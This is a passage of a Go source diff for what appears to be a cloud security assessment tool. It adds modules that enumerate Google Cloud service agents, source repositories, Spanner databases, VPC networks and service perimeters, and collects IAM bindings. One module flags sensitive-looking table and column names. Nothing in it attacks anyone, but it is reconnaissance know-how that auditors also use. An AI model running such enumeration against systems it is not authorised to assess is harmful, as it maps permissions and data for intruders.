+func (s *ServiceAgentsService) GetServiceAgents(projectID string, orgCache ...*gcpinternal.OrgCache) ([]ServiceAgentInfo, error) { + ctx := context.Background() + service, err := s.getResourceManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + // Get optional OrgCache + var cache *gcpinternal.OrgCache + if len(orgCache) > 0 { + cache = orgCache[0] + } + + var agents []ServiceAgentInfo + + // Get IAM policy + policy, err := service.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + // Track which service agents we've seen + seenAgents := make(map[string]*ServiceAgentInfo) + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if !strings.HasPrefix(member, "serviceAccount:") { + continue + } + + email := strings.TrimPrefix(member, "serviceAccount:") + + // Check if it's a service agent + agentType, description := s.identifyServiceAgent(email) + if agentType == "" { + continue // Not a service agent + } + + // Extract source project from email (may be a project number or ID) + sourceProject := s.extractSourceProject(email) + + // Resolve project number to ID using OrgCache if available + sourceProjectID := sourceProject + if cache != nil && cache.IsPopulated() && sourceProject != "" { + if resolved := cache.GetProjectIDByNumber(sourceProject); resolved != "" { + sourceProjectID = resolved + } + } + + // Check for cross-project access using resolved ID + isCrossProject := sourceProjectID != "" && sourceProjectID != projectID + + // Add or update agent + if agent, exists := seenAgents[email]; exists { + agent.Roles = append(agent.Roles, binding.Role) + } else { + agent := &ServiceAgentInfo{ + Email: email, + ProjectID: projectID, + SourceProject: sourceProjectID, + ServiceName: agentType, + AgentType: 
agentType, + Roles: []string{binding.Role}, + IsCrossProject: isCrossProject, + Description: description, + } + seenAgents[email] = agent + } + } + } + + // Convert to slice + for _, agent := range seenAgents { + agents = append(agents, *agent) + } + + return agents, nil +} + +// extractSourceProject extracts the source project ID/number from a service agent email +func (s *ServiceAgentsService) extractSourceProject(email string) string { + parts := strings.Split(email, "@") + if len(parts) != 2 { + return "" + } + + prefix := parts[0] + domain := parts[1] + + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + return prefix // This is the project number + } + + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + return prefix[:idx] // Project number + } + } + + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix // This is the project ID + } + + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + if strings.HasPrefix(prefix, "service-") { + return strings.TrimPrefix(prefix, "service-") // Project number + } + return prefix + } + + // Pattern: PROJECT_NUMBER@compute-system.iam.gserviceaccount.com + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + // Most service agents use project number as prefix + if strings.HasPrefix(prefix, "service-") { + return strings.TrimPrefix(prefix, "service-") + } + return prefix + } + + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + return prefix // Project number + } + + // Pattern: PROJECT_NUMBER@container-engine-robot.iam.gserviceaccount.com + if strings.Contains(domain, 
"container-engine-robot") { + return prefix + } + + // Pattern: PROJECT_NUMBER@serverless-robot-prod.iam.gserviceaccount.com + if strings.Contains(domain, "serverless-robot-prod") { + return prefix + } + + return "" +} + +func (s *ServiceAgentsService) identifyServiceAgent(email string) (string, string) { + // Check known patterns + for suffix, info := range KnownServiceAgents { + if strings.HasSuffix(email, suffix) { + return info.Service, info.Description + } + } + + // Check for generic service agent patterns + if strings.Contains(email, "@gcp-sa-") { + // Extract service name from gcp-sa-{service} + parts := strings.Split(email, "@") + if len(parts) == 2 { + saPart := parts[1] + if strings.HasPrefix(saPart, "gcp-sa-") { + serviceName := strings.TrimPrefix(saPart, "gcp-sa-") + serviceName = strings.Split(serviceName, ".")[0] + return serviceName, fmt.Sprintf("%s Service Agent", serviceName) + } + } + } + + // Check for project-specific service agents + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + return "Compute Engine", "Default Compute Engine service account" + } + + if strings.Contains(email, "@appspot.gserviceaccount.com") { + return "App Engine", "App Engine default service account" + } + + return "", "" +} + +// GetDefaultServiceAccounts returns the default service accounts for a project +func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, projectNumber string) []ServiceAgentInfo { + var defaults []ServiceAgentInfo + + // Google APIs Service Agent + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@cloudservices.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Google APIs", + AgentType: "Google APIs", + Description: "Google APIs Service Agent - automatically created, manages resources on behalf of Google Cloud services", + }) + + // Compute Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: 
fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Compute Engine", + AgentType: "Compute Engine", + Description: "Default Compute Engine service account - used by instances without explicit SA", + }) + + // App Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID), + ProjectID: projectID, + ServiceName: "App Engine", + AgentType: "App Engine", + Description: "App Engine default service account", + }) + + return defaults +} diff --git a/gcp/services/sourceReposService/sourceReposService.go b/gcp/services/sourceReposService/sourceReposService.go new file mode 100644 index 00000000..5aaaef24 --- /dev/null +++ b/gcp/services/sourceReposService/sourceReposService.go @@ -0,0 +1,132 @@ +package sourcereposservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + sourcerepo "google.golang.org/api/sourcerepo/v1" +) + +type SourceReposService struct{ + session *gcpinternal.SafeSession +} + +func New() *SourceReposService { + return &SourceReposService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SourceReposService { + return &SourceReposService{ + session: session, + } +} + +// RepoInfo represents a Cloud Source Repository +type RepoInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + URL string `json:"url"` + Size int64 `json:"size"` + MirrorConfig bool `json:"mirrorConfig"` + MirrorURL string `json:"mirrorUrl"` + PubsubConfigs int `json:"pubsubConfigs"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// getService returns a source repo service client using cached session if available +func (s *SourceReposService) 
getService(ctx context.Context) (*sourcerepo.Service, error) { + if s.session != nil { + return sdk.CachedGetSourceRepoService(ctx, s.session) + } + return sourcerepo.NewService(ctx) +} + +// ListRepos retrieves all Cloud Source Repositories in a project +func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") + } + + var repos []RepoInfo + + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.Repos.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") + } + + for _, repo := range resp.Repos { + info := s.parseRepo(repo, projectID) + + // Get IAM policy for this repo + iamBindings := s.getRepoIAMBindings(service, repo.Name) + info.IAMBindings = iamBindings + + repos = append(repos, info) + } + + return repos, nil +} + +// getRepoIAMBindings retrieves IAM bindings for a repository +func (s *SourceReposService) getRepoIAMBindings(service *sourcerepo.Service, repoName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Repos.GetIamPolicy(repoName).OptionsRequestedPolicyVersion(3).Do() + if err != nil { + // Silently skip if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func (s *SourceReposService) parseRepo(repo *sourcerepo.Repo, projectID string) RepoInfo { + // Extract repo name from full path + name := repo.Name + if strings.Contains(name, "/") { + parts := strings.Split(name, "/") + name = parts[len(parts)-1] + } + + info := RepoInfo{ + Name: name, + ProjectID: projectID, + URL: repo.Url, + Size: repo.Size, + } + + // Check for mirror configuration + 
if repo.MirrorConfig != nil { + info.MirrorConfig = true + info.MirrorURL = repo.MirrorConfig.Url + } + + // Count pubsub configs + if repo.PubsubConfigs != nil { + info.PubsubConfigs = len(repo.PubsubConfigs) + } + + return info +} + diff --git a/gcp/services/spannerEnumService/spannerEnumService.go b/gcp/services/spannerEnumService/spannerEnumService.go new file mode 100644 index 00000000..0b2634f6 --- /dev/null +++ b/gcp/services/spannerEnumService/spannerEnumService.go @@ -0,0 +1,201 @@ +package spannerenumservice + +import ( + "context" + "fmt" + "regexp" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + spanner "google.golang.org/api/spanner/v1" +) + +type SpannerEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *SpannerEnumService { + return &SpannerEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SpannerEnumService { + return &SpannerEnumService{session: session} +} + +// SensitiveSpannerResource represents a Spanner resource flagged as potentially sensitive. +type SensitiveSpannerResource struct { + ProjectID string `json:"projectId"` + Instance string `json:"instance"` + Database string `json:"database"` + Table string `json:"table"` + Column string `json:"column"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getSpannerService returns a Spanner service client. +func (s *SpannerEnumService) getSpannerService(ctx context.Context) (*spanner.Service, error) { + return spanner.NewService(ctx) +} + +// EnumerateSensitiveResources scans Spanner DDL for sensitive table/column names. 
+func (s *SpannerEnumService) EnumerateSensitiveResources(projectID string) ([]SensitiveSpannerResource, error) { + ctx := context.Background() + + service, err := s.getSpannerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + var resources []SensitiveSpannerResource + + // List instances + parent := fmt.Sprintf("projects/%s", projectID) + err = service.Projects.Instances.List(parent).Pages(ctx, func(page *spanner.ListInstancesResponse) error { + for _, instance := range page.Instances { + instanceName := extractName(instance.Name) + + // List databases for this instance + err := service.Projects.Instances.Databases.List(instance.Name).Pages(ctx, func(dbPage *spanner.ListDatabasesResponse) error { + for _, db := range dbPage.Databases { + dbName := extractName(db.Name) + + // Get DDL for this database + ddlResp, err := service.Projects.Instances.Databases.GetDdl(db.Name).Context(ctx).Do() + if err != nil { + continue + } + + // Parse DDL for table and column names + for _, stmt := range ddlResp.Statements { + tableName, columns := parseDDLStatement(stmt) + if tableName == "" { + continue + } + + // Check table name + if match := shared.MatchResourceName(tableName, namePatterns); match != nil { + resources = append(resources, SensitiveSpannerResource{ + ProjectID: projectID, + Instance: instanceName, + Database: dbName, + Table: tableName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Check column names + for _, col := range columns { + if match := shared.MatchResourceName(col, namePatterns); match != nil { + resources = append(resources, SensitiveSpannerResource{ + ProjectID: projectID, + Instance: instanceName, + Database: dbName, + Table: tableName, + Column: col, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column name: %s", 
match.Description), + }) + } + } + } + } + return nil + }) + if err != nil { + // Continue to next instance on error + continue + } + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + return resources, nil +} + +// createTableRegex matches CREATE TABLE statements. +var createTableRegex = regexp.MustCompile(`(?i)CREATE\s+TABLE\s+(\S+)\s*\(`) + +// columnRegex matches column definitions inside CREATE TABLE parentheses. +var columnRegex = regexp.MustCompile(`(?i)^\s*(\w+)\s+`) + +// parseDDLStatement extracts table name and column names from a CREATE TABLE DDL statement. +func parseDDLStatement(stmt string) (string, []string) { + match := createTableRegex.FindStringSubmatch(stmt) + if match == nil { + return "", nil + } + + tableName := strings.Trim(match[1], "`\"") + + // Find the content between the first ( and the matching ) + parenStart := strings.Index(stmt, "(") + if parenStart < 0 { + return tableName, nil + } + + // Find matching closing paren + depth := 0 + parenEnd := -1 + for i := parenStart; i < len(stmt); i++ { + switch stmt[i] { + case '(': + depth++ + case ')': + depth-- + if depth == 0 { + parenEnd = i + } + } + if parenEnd >= 0 { + break + } + } + + if parenEnd < 0 { + return tableName, nil + } + + columnsStr := stmt[parenStart+1 : parenEnd] + lines := strings.Split(columnsStr, ",") + + var columns []string + for _, line := range lines { + line = strings.TrimSpace(line) + if line == "" { + continue + } + // Skip constraint lines + lineLower := strings.ToLower(line) + if strings.HasPrefix(lineLower, "constraint") || + strings.HasPrefix(lineLower, "primary key") || + strings.HasPrefix(lineLower, "foreign key") || + strings.HasPrefix(lineLower, "interleave") { + continue + } + colMatch := columnRegex.FindStringSubmatch(line) + if colMatch != nil { + columns = append(columns, colMatch[1]) + } + } + + return tableName, columns +} + +func extractName(fullName string) string { + parts := 
strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go new file mode 100644 index 00000000..00609ed1 --- /dev/null +++ b/gcp/services/spannerService/spannerService.go @@ -0,0 +1,200 @@ +package spannerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + spanner "google.golang.org/api/spanner/v1" +) + +type SpannerService struct { + session *gcpinternal.SafeSession +} + +func New() *SpannerService { + return &SpannerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SpannerService { + return &SpannerService{ + session: session, + } +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +type SpannerInstanceInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Config string `json:"config"` + NodeCount int64 `json:"nodeCount"` + State string `json:"state"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerDatabaseInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + InstanceName string `json:"instanceName"` + State string `json:"state"` + EncryptionType string `json:"encryptionType"` + KmsKeyName string `json:"kmsKeyName"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerResult struct { + Instances []SpannerInstanceInfo + Databases []SpannerDatabaseInfo +} + +// getService returns a Spanner service client using cached session if available +func (s *SpannerService) getService(ctx context.Context) (*spanner.Service, error) { + if s.session != nil { + return 
sdk.CachedGetSpannerService(ctx, s.session) + } + return spanner.NewService(ctx) +} + +// ListInstancesAndDatabases retrieves all Spanner instances and databases with IAM bindings +func (s *SpannerService) ListInstancesAndDatabases(projectID string) (*SpannerResult, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + result := &SpannerResult{ + Instances: []SpannerInstanceInfo{}, + Databases: []SpannerDatabaseInfo{}, + } + + parent := fmt.Sprintf("projects/%s", projectID) + + req := service.Projects.Instances.List(parent) + err = req.Pages(ctx, func(page *spanner.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := SpannerInstanceInfo{ + Name: extractName(instance.Name), + FullName: instance.Name, + ProjectID: projectID, + DisplayName: instance.DisplayName, + Config: extractName(instance.Config), + NodeCount: instance.NodeCount, + State: instance.State, + } + + // Get IAM bindings for this instance + info.IAMBindings = s.getInstanceIAMBindings(service, ctx, instance.Name) + + result.Instances = append(result.Instances, info) + + // Get databases for this instance + databases := s.listDatabases(service, ctx, instance.Name, projectID) + result.Databases = append(result.Databases, databases...) 
+ } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + return result, nil +} + +// getInstanceIAMBindings retrieves IAM bindings for an instance +func (s *SpannerService) getInstanceIAMBindings(service *spanner.Service, ctx context.Context, instanceName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.GetIamPolicy(instanceName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// listDatabases retrieves all databases for an instance with their IAM bindings +func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Context, instanceName string, projectID string) []SpannerDatabaseInfo { + var databases []SpannerDatabaseInfo + + req := service.Projects.Instances.Databases.List(instanceName) + err := req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { + for _, db := range page.Databases { + dbInfo := SpannerDatabaseInfo{ + Name: extractName(db.Name), + FullName: db.Name, + ProjectID: projectID, + InstanceName: extractName(instanceName), + State: db.State, + } + + // Determine encryption type + if db.EncryptionConfig != nil && db.EncryptionConfig.KmsKeyName != "" { + dbInfo.EncryptionType = "CMEK" + dbInfo.KmsKeyName = db.EncryptionConfig.KmsKeyName + } else { + dbInfo.EncryptionType = "Google-managed" + } + + // Get IAM bindings for this database + dbInfo.IAMBindings = s.getDatabaseIAMBindings(service, ctx, db.Name) + + databases = append(databases, dbInfo) + } + return nil + }) + if err != nil { + // Log but don't fail - return whatever we collected + return databases + } + + return databases +} + +// getDatabaseIAMBindings retrieves IAM bindings for a database +func (s 
*SpannerService) getDatabaseIAMBindings(service *spanner.Service, ctx context.Context, databaseName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.Databases.GetIamPolicy(databaseName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/vpcService/vpcService.go b/gcp/services/vpcService/vpcService.go new file mode 100644 index 00000000..a5ddb1d9 --- /dev/null +++ b/gcp/services/vpcService/vpcService.go @@ -0,0 +1,309 @@ +package vpcservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" +) + +type VPCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCService { + return &VPCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCService { + return &VPCService{session: session} +} + +// getService returns a Compute service client using cached session if available +func (s *VPCService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// VPCNetworkInfo represents a VPC network +type VPCNetworkInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + AutoCreateSubnetworks bool `json:"autoCreateSubnetworks"` + RoutingMode string `json:"routingMode"` // REGIONAL or GLOBAL + MTU int64 `json:"mtu"` + Subnetworks 
[]string `json:"subnetworks"` + Peerings []string `json:"peerings"` + FirewallPolicyCount int `json:"firewallPolicyCount"` +} + +// SubnetInfo represents a subnetwork +type SubnetInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Region string `json:"region"` + IPCidrRange string `json:"ipCidrRange"` + GatewayAddress string `json:"gatewayAddress"` + PrivateIPGoogleAccess bool `json:"privateIpGoogleAccess"` + Purpose string `json:"purpose"` + EnableFlowLogs bool `json:"enableFlowLogs"` + SecondaryIPRanges []string `json:"secondaryIpRanges"` +} + +// VPCPeeringInfo represents a VPC peering connection +type VPCPeeringInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + PeerNetwork string `json:"peerNetwork"` + PeerProjectID string `json:"peerProjectId"` + State string `json:"state"` + ExportCustomRoutes bool `json:"exportCustomRoutes"` + ImportCustomRoutes bool `json:"importCustomRoutes"` + ExchangeSubnetRoutes bool `json:"exchangeSubnetRoutes"` +} + +// RouteInfo represents a route +type RouteInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + DestRange string `json:"destRange"` + NextHopType string `json:"nextHopType"` + NextHop string `json:"nextHop"` + Priority int64 `json:"priority"` + Tags []string `json:"tags"` +} + +// ListVPCNetworks retrieves all VPC networks +func (s *VPCService) ListVPCNetworks(projectID string) ([]VPCNetworkInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var networks []VPCNetworkInfo + + resp, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, network := range resp.Items { + info := s.parseNetwork(network, 
projectID) + networks = append(networks, info) + } + + return networks, nil +} + +// ListSubnets retrieves all subnets +func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var subnets []SubnetInfo + + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for _, scopedList := range page.Items { + for _, subnet := range scopedList.Subnetworks { + info := s.parseSubnet(subnet, projectID) + subnets = append(subnets, info) + } + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + return subnets, nil +} + +// ListVPCPeerings retrieves all VPC peering connections +func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var peerings []VPCPeeringInfo + + networks, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, network := range networks.Items { + for _, peering := range network.Peerings { + // Extract peer project ID from the full network path + peerProjectID := extractProjectFromNetwork(peering.Network) + + info := VPCPeeringInfo{ + Name: peering.Name, + ProjectID: projectID, + Network: network.Name, + PeerNetwork: extractName(peering.Network), + PeerProjectID: peerProjectID, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + } + peerings = append(peerings, info) + } + } + + return peerings, nil +} + +// ListRoutes 
retrieves all routes +func (s *VPCService) ListRoutes(projectID string) ([]RouteInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var routes []RouteInfo + + resp, err := service.Routes.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, route := range resp.Items { + info := s.parseRoute(route, projectID) + routes = append(routes, info) + } + + return routes, nil +} + +func (s *VPCService) parseNetwork(network *compute.Network, projectID string) VPCNetworkInfo { + info := VPCNetworkInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + MTU: network.Mtu, + } + + for _, subnet := range network.Subnetworks { + info.Subnetworks = append(info.Subnetworks, extractName(subnet)) + } + + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, peering.Name) + } + + return info +} + +func (s *VPCService) parseSubnet(subnet *compute.Subnetwork, projectID string) SubnetInfo { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Network: extractName(subnet.Network), + Region: extractRegion(subnet.Region), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + } + + if subnet.LogConfig != nil { + info.EnableFlowLogs = subnet.LogConfig.Enable + } + + for _, secondary := range subnet.SecondaryIpRanges { + info.SecondaryIPRanges = append(info.SecondaryIPRanges, fmt.Sprintf("%s:%s", secondary.RangeName, secondary.IpCidrRange)) + } + + return info +} + +func (s *VPCService) parseRoute(route *compute.Route, projectID string) RouteInfo { + info := RouteInfo{ + Name: route.Name, + ProjectID: 
projectID, + Network: extractName(route.Network), + DestRange: route.DestRange, + Priority: route.Priority, + Tags: route.Tags, + } + + // Determine next hop type + if route.NextHopGateway != "" { + info.NextHopType = "gateway" + info.NextHop = extractName(route.NextHopGateway) + } else if route.NextHopInstance != "" { + info.NextHopType = "instance" + info.NextHop = extractName(route.NextHopInstance) + } else if route.NextHopIp != "" { + info.NextHopType = "ip" + info.NextHop = route.NextHopIp + } else if route.NextHopNetwork != "" { + info.NextHopType = "network" + info.NextHop = extractName(route.NextHopNetwork) + } else if route.NextHopPeering != "" { + info.NextHopType = "peering" + info.NextHop = route.NextHopPeering + } else if route.NextHopIlb != "" { + info.NextHopType = "ilb" + info.NextHop = extractName(route.NextHopIlb) + } else if route.NextHopVpnTunnel != "" { + info.NextHopType = "vpn_tunnel" + info.NextHop = extractName(route.NextHopVpnTunnel) + } + + return info +} + +func extractProjectFromNetwork(networkPath string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + // or: projects/{project}/global/networks/{network} + parts := strings.Split(networkPath, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractRegion(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + return fullPath +} diff --git a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go new file mode 100644 index 00000000..45a08915 --- /dev/null +++ b/gcp/services/vpcscService/vpcscService.go @@ -0,0 +1,247 @@ +package vpcscservice + 
+import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type VPCSCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCSCService { + return &VPCSCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCSCService { + return &VPCSCService{session: session} +} + +// getService returns an Access Context Manager service client using cached session if available +func (s *VPCSCService) getService(ctx context.Context) (*accesscontextmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetAccessContextManagerService(ctx, s.session) + } + return accesscontextmanager.NewService(ctx) +} + +// AccessPolicyInfo represents an access policy +type AccessPolicyInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Parent string `json:"parent"` + Etag string `json:"etag"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` +} + +// ServicePerimeterInfo represents a VPC Service Control perimeter +type ServicePerimeterInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + PerimeterType string `json:"perimeterType"` // PERIMETER_TYPE_REGULAR or PERIMETER_TYPE_BRIDGE + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Status configuration + Resources []string `json:"resources"` // Projects in the perimeter + RestrictedServices []string `json:"restrictedServices"` // Services protected + AccessLevels []string `json:"accessLevels"` // Access levels allowed + VPCAccessibleServices []string `json:"vpcAccessibleServices"` + + // Ingress/Egress policies + IngressPolicyCount int `json:"ingressPolicyCount"` + EgressPolicyCount int `json:"egressPolicyCount"` + HasIngressRules bool 
`json:"hasIngressRules"` + HasEgressRules bool `json:"hasEgressRules"` +} + +// AccessLevelInfo represents an access level +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Conditions + IPSubnetworks []string `json:"ipSubnetworks"` + Regions []string `json:"regions"` + Members []string `json:"members"` +} + +// ListAccessPolicies retrieves all access policies for an organization +func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var policies []AccessPolicyInfo + + // List access policies for the organization + parent := fmt.Sprintf("organizations/%s", orgID) + req := service.AccessPolicies.List().Parent(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + info := AccessPolicyInfo{ + Name: extractPolicyName(policy.Name), + Title: policy.Title, + Parent: policy.Parent, + Etag: policy.Etag, + } + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return policies, nil +} + +// ListServicePerimeters retrieves all service perimeters for an access policy +func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerimeterInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var perimeters []ServicePerimeterInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := 
